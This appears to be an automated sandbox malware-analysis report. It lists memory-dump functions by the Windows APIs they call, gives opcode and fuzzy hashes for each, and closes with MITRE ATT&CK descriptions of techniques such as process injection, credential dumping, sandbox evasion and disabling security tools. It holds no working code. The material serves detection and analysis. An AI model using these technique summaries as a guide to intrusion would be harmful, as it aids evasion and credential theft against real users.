Uniqueness Score: -1.00%

Function 0168A7B2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0168A7F6

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c42e7cf65fe5e24c0eead4cfe65bbda1fcd938dbf0f6120f367d15bced43ba6b
Instruction ID: 0b26c162aec89a90b18f7a0b34ab032889f1a2e6a8930f3930fbf331a6fc0014
Opcode Fuzzy Hash: c42e7cf65fe5e24c0eead4cfe65bbda1fcd938dbf0f6120f367d15bced43ba6b
Instruction Fuzzy Hash: A0015B71800600AFDB219F95D844B66FFE0EF48320F08C9AADE494B612D375A419DF61

Uniqueness

Uniqueness Score: -1.00%

Function 05F94FBE, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E2C,?,?), ref: 05F9500E

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 19c6dbbc75a0a8ffda17109ee563239f8d92a86b922b0ce173bb3eef76ced639
Instruction ID: fd4958302cda9c49e02c0cf46974d2cb321a25d213dc8076ff03543c237b5b36
Opcode Fuzzy Hash: 19c6dbbc75a0a8ffda17109ee563239f8d92a86b922b0ce173bb3eef76ced639
Instruction Fuzzy Hash: DD016276500604ABD250DF16DC86F36FBA8FB88B20F14815AED085B741E771F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 05F922DA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05F92318

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 76eff18d09984c53297c9874f3b456845194108865fcfb491e7f0c5ac9354051
Instruction ID: fcc98f979095cfb9d0ad7c6e8fea5ba9915e2ff346b488da4a6a2b2cba256374
Opcode Fuzzy Hash: 76eff18d09984c53297c9874f3b456845194108865fcfb491e7f0c5ac9354051
Instruction Fuzzy Hash: 8C019E36800600EFEF21CF55D884F66FFA5EF48320F08C4AADE498B212D275A418DF62

Uniqueness

Uniqueness Score: -1.00%

Function 05F914B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05F91502

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 1adece18ed95de9557ba5e2a70701df006dbcab09bfae382975914393ddbbb60
Instruction ID: 361aa7866b08ffed9bfad66d45f7637d165754c5dac255b31142d85227343abc
Opcode Fuzzy Hash: 1adece18ed95de9557ba5e2a70701df006dbcab09bfae382975914393ddbbb60
Instruction Fuzzy Hash: 1C016276500600ABD250DF16DC86F36FBA8FB88B20F14815AED085B741E771F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 05F91A26, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05F91A58

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b7bc89d97073dcead51fc6c2c69a283b0fd1653fa2ba7cd560703548a2c0ef7b
Instruction ID: 2a2a2ffd002c751a3595418976fd621d280090a8aba79eb7eb33907c3faed738
Opcode Fuzzy Hash: b7bc89d97073dcead51fc6c2c69a283b0fd1653fa2ba7cd560703548a2c0ef7b
Instruction Fuzzy Hash: 3B01DF719007419FEB14CF29D884B66FF98EF04320F18C4BBDE098B252D279A848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0168B962, Relevance: 1.5, APIs: 1, Instructions: 43comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?,00000E2C,?,?), ref: 0168B9B2

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 1221b66cb52be655e02bf4e9db06e6e18f235ae5cf4b3e2a0f88928677f00dba
Instruction ID: a96bff10de225852dc443086006b3581d8328f6be13578710928ab9361ded4d7
Opcode Fuzzy Hash: 1221b66cb52be655e02bf4e9db06e6e18f235ae5cf4b3e2a0f88928677f00dba
Instruction Fuzzy Hash: 6501A275500600ABD210DF16DC82F36FBA8FB88B20F14815AED084B741E331F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0168AC76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 0168ACA8

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e09da348be53e91d2e6f8c7b51adf454f38f87352526b7755175532297dd7842
Instruction ID: 37edb240f35ee1fa9249e1ad2fa186b545e422e600467d1c998c08e2efbe9112
Opcode Fuzzy Hash: e09da348be53e91d2e6f8c7b51adf454f38f87352526b7755175532297dd7842
Instruction Fuzzy Hash: 80018B719002409FDB119F6ADC85766FFA4EF44220F18C5ABDD098B352D6B9A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0168AB2E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E2C,?,?), ref: 0168AB7E

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: c08a75093da8fdfb3b0f3ee246a07a69f0af1a1e1066f7c53132ae594026e7d6
Instruction ID: 79e710cb19a8893b9076deb4f67ec542661b629942e53c614834a12a890d2104
Opcode Fuzzy Hash: c08a75093da8fdfb3b0f3ee246a07a69f0af1a1e1066f7c53132ae594026e7d6
Instruction Fuzzy Hash: D6016276500600ABD250DF16DC86F36FBA8FB88B20F14815AED085B741E771F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0168B00E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 0168B040

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 47349f9563448b2f0c90c6dcdeb26cc567924f2b2a20cd355aeb4f29502e6347
Instruction ID: 1ac1d824ef7cbd8714b88bb896c0aec16b91741aabf90785f0c6ce8e1f96432b
Opcode Fuzzy Hash: 47349f9563448b2f0c90c6dcdeb26cc567924f2b2a20cd355aeb4f29502e6347
Instruction Fuzzy Hash: 4601DB71900600DFDB10DF29EC84B66FFA4EF44220F08C1ABDD4A8B752D6B5A809CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0168B30E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 0168B35E

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 83939eccc678db962d1e801e20527cf4994836ec5e82babb18908ec854437e3f
Instruction ID: 0f186bc08b310766b0135af7cf23afcb6c302478050d1a44e590c603ce41051a
Opcode Fuzzy Hash: 83939eccc678db962d1e801e20527cf4994836ec5e82babb18908ec854437e3f
Instruction Fuzzy Hash: BE016276500604ABD250DF16DC86F36FBA8FB88B20F14815AED085B741E771F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0168A09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0168A0D5

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 85e2b74be6556f5de426da69f68229a8bf2ffab24f530422f510f4ff7aa064fc
Instruction ID: 7b688704aeed7b57018bdf317d2c49a44c02688fe7814f4a6bd98f6a8d7975a2
Opcode Fuzzy Hash: 85e2b74be6556f5de426da69f68229a8bf2ffab24f530422f510f4ff7aa064fc
Instruction Fuzzy Hash: CE019E314006409FDB21DF99DC44B66FFA0EF48325F08C5ABDE498B652D2B5A418CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0168A47A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0168A4AC

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 6dd779d36a9353f930f2b02c9ab4c1edd18a780b2a58bf0fa737659ab1aada9b
Instruction ID: 0043f32d7a0bc855be64bd7b4a693191e0898852146aa9b65afdae0910d832e2
Opcode Fuzzy Hash: 6dd779d36a9353f930f2b02c9ab4c1edd18a780b2a58bf0fa737659ab1aada9b
Instruction Fuzzy Hash: 2B01AD708012449FDB11DF59D888766FFA4EF44220F18C5ABDE088F302D2B9A408CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0168A876, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 0168A8A8

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8672a97a72de9ae2681fb13720b8d78515774f70a9233166041dd38e2cbe46f8
Instruction ID: 182afebf3a0aaef7e487df7a7b200cfd05c7ba9d6cba9c0723cdbcf91194f315
Opcode Fuzzy Hash: 8672a97a72de9ae2681fb13720b8d78515774f70a9233166041dd38e2cbe46f8
Instruction Fuzzy Hash: A5F08C74900644DFDB219F59D884762FFA4EF04220F18C19BDD495B352D3B9A80ADE72

Uniqueness

Uniqueness Score: -1.00%

Function 05FA2F8A, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.481428463.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4b628d509ad07417e5b11eb99c65a2db74942da9db53cfbc7b8beb6a5f4a6f
Instruction ID: 4bc93e072ecc014b5f39e46e3d65c04a3f28345cf488728737895a232a4cc201
Opcode Fuzzy Hash: da4b628d509ad07417e5b11eb99c65a2db74942da9db53cfbc7b8beb6a5f4a6f
Instruction Fuzzy Hash: B021E4B5608341AFD340CF19D880A5BFBE4EB89664F04896EF98897311E270E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 05FA39FC, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.481428463.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37db4e09f12ab8ec9f620bdca4ab9b8be2b7a558a7cec8637e97a80eb8e67e33
Instruction ID: 85996f65ef4aae5a31fe229ce3536b7f7f19f5c6f998022de6037a178cb3ff63
Opcode Fuzzy Hash: 37db4e09f12ab8ec9f620bdca4ab9b8be2b7a558a7cec8637e97a80eb8e67e33
Instruction Fuzzy Hash: DC11BBB5508301AFD340CF19D840A5BFBE4FB8C664F14895EF99897311D271E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 0172075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476110408.0000000001720000.00000040.00000040.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2896a04192905a2ab6a5c4b04d4879e5ff9135a932ea125ecb64e428bd63fe
Instruction ID: 207500b1e105390f66b0f3de622a63bca749323643dd173a5a4687a27cebddf5
Opcode Fuzzy Hash: 7d2896a04192905a2ab6a5c4b04d4879e5ff9135a932ea125ecb64e428bd63fe
Instruction Fuzzy Hash: C111A234204284EFD715CB24C984B26FB95AB88718F24C59DF9491B753C777D803CE61

Uniqueness

Uniqueness Score: -1.00%

Function 05FA38A0, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.481428463.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0a4ec3cb612b07ab8e794ba6d109f20ab8fd31886ca5b3d112f70b5bcdc9aa
Instruction ID: cf5371b907754488664e076c754de9608fa628960b3dd54de6a6205d805f6a2a
Opcode Fuzzy Hash: 1b0a4ec3cb612b07ab8e794ba6d109f20ab8fd31886ca5b3d112f70b5bcdc9aa
Instruction Fuzzy Hash: 6F11BEB5608305AFD350CF59DC81E57FBE8EB88660F14891EFD5997311D271E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 017205D0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476110408.0000000001720000.00000040.00000040.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0707e9c661a05e21501e5633fe15f8f5aa17975169463e25e498773a9ffaf912
Instruction ID: 5a7e7665a5d433053f424b013283ee7485c5665145f8ac820cc3e8c7204c9b1a
Opcode Fuzzy Hash: 0707e9c661a05e21501e5633fe15f8f5aa17975169463e25e498773a9ffaf912
Instruction Fuzzy Hash: 88F0F9B25093805FD7128F06EC40863FFA8EB86220758C09FED498B612D125A905CB72

Uniqueness

Uniqueness Score: -1.00%

Function 017205B0, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476110408.0000000001720000.00000040.00000040.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6111796c3422687de6499c543d817123f2dae9c68155dccea08b2a45accc36d1
Instruction ID: 4d9626d5c4778eb95098c6ba6414d307abd6a9dbecd17179cb48da4d074197f6
Opcode Fuzzy Hash: 6111796c3422687de6499c543d817123f2dae9c68155dccea08b2a45accc36d1
Instruction Fuzzy Hash: 82F0B4B6A446409FC611CF0AEC41491FBD4EB88630B28C46BDC098B701E13AA805CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 01720818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476110408.0000000001720000.00000040.00000040.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction ID: b7882534587138cf319192ba74da7292bf6865778aa382589bedf0e42870771f
Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction Fuzzy Hash: E2F0FB35144644DFC606CB44D940B16FBA2EB89718F24C6A9E9490B762C3379813DE91

Uniqueness

Uniqueness Score: -1.00%

Function 017205C0, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476110408.0000000001720000.00000040.00000040.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3106323fb9804faf8a1f84b3906e89c14be8a89aa587c09710d1bc85552d51
Instruction ID: 77028b45ad9f2b44fdd658716b1d68be79adaee79a0ef985e04cea08100bb786
Opcode Fuzzy Hash: 3e3106323fb9804faf8a1f84b3906e89c14be8a89aa587c09710d1bc85552d51
Instruction Fuzzy Hash: 5AE06DB6A456408BCB51CF0AF9810A1FBD0EB94670728C4AFDC0D8B751E13AA509DF92

Uniqueness

Uniqueness Score: -1.00%

Function 017205F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476110408.0000000001720000.00000040.00000040.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f460880a68c4f00c3319b99d1201ef6c752971b2329ecf9c4e6160bdb0169f3
Instruction ID: a523b346b9a2e102675a7644b8632f7cf710ada19d4c4e9fa4553cdf2f5b848f
Opcode Fuzzy Hash: 3f460880a68c4f00c3319b99d1201ef6c752971b2329ecf9c4e6160bdb0169f3
Instruction Fuzzy Hash: B0E09276A006008BD650CF0BEC41462F7D8EB88630B18C07FDC0D8B700E135B504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 05FA2FFF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.481428463.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d858ae85dbc3123b8a7b6c06a861332c43c25071f313724a380272cdc4d00876
Instruction ID: 973c60447f03489230e82bdc5f3691c7c1079c002113a5f7ee3b433e7796694b
Opcode Fuzzy Hash: d858ae85dbc3123b8a7b6c06a861332c43c25071f313724a380272cdc4d00876
Instruction Fuzzy Hash: 90E0D872A0130067D2508F069C41B63FB58DB44A30F14C45BEE0C1F342E571B5148AE1

Uniqueness

Uniqueness Score: -1.00%

Function 05FA38EF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.481428463.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4280de568dee84bf689cd3bd681c3d56c32bf0e93aefb1525865d1b09c77a8c2
Instruction ID: 18911bd3fd84ad9365dfda03082b7c2d6f7185ddf7776ff73c296a0491f71d43
Opcode Fuzzy Hash: 4280de568dee84bf689cd3bd681c3d56c32bf0e93aefb1525865d1b09c77a8c2
Instruction Fuzzy Hash: 83E0D87290130467D2509F069C81B63FB98DB44A30F14C45BEE0D1B302E172B5048AF1

Uniqueness

Uniqueness Score: -1.00%

Function 05FA3A67, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.481428463.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b51f6169a9c718a9cb4b0a023e7db259833aace6ca33e62606c92cd566974131
Instruction ID: ba464b5a24009719ffe71310ec82f6709ffd4fe03be84284e3d2a14e9144aab5
Opcode Fuzzy Hash: b51f6169a9c718a9cb4b0a023e7db259833aace6ca33e62606c92cd566974131
Instruction Fuzzy Hash: A6E0D8B295130067D2508F06DC41B63FB98DB48A30F14C46BED0C1B341E171B514CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 05FA3313, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.481428463.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc90819a79d3c96a6e2d3c8b78a2a4eed14736a477d755a03f67e72f75c480fa
Instruction ID: a2511e80c03df30e1e9501224ac6b232f9fadb981a37fc3afbc56dbb4a415652
Opcode Fuzzy Hash: fc90819a79d3c96a6e2d3c8b78a2a4eed14736a477d755a03f67e72f75c480fa
Instruction Fuzzy Hash: F8E0D87290130067D2509F069C41B63FB98DB44A30F14C45BEE0C1B301E172B514CEE1

Uniqueness

Uniqueness Score: -1.00%

Function 016823F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475957597.0000000001682000.00000040.00000001.sdmp, Offset: 01682000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3149531bc8b2ed1e0e8b0a447c8cd6cf2c21a7239e4530e769aba0ccfe8b7602
Instruction ID: cd89ba6ceb20a1cd95ea73bf0de35d9c209f697a16fe01bc41042fb1b63d8e8f
Opcode Fuzzy Hash: 3149531bc8b2ed1e0e8b0a447c8cd6cf2c21a7239e4530e769aba0ccfe8b7602
Instruction Fuzzy Hash: 33D05E79216A818FE3269A1CC5B8B953FA4AB51B04F4644FEE8008B763C368D9D1D210

Uniqueness

Uniqueness Score: -1.00%

Function 016823BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475957597.0000000001682000.00000040.00000001.sdmp, Offset: 01682000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818e9e7b7eb07a26bca5cec9fb495d80e484776180eb4ecede1f587d07e2134a
Instruction ID: d5af127043c59111cf538f9e99c043b9bac12ad462bd0d12bdf2a89ae389e422
Opcode Fuzzy Hash: 818e9e7b7eb07a26bca5cec9fb495d80e484776180eb4ecede1f587d07e2134a
Instruction Fuzzy Hash: 15D05E342002818BD716EB0CC9B4F593BD4AB41B00F0645ECBD008B762C3A4D981C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

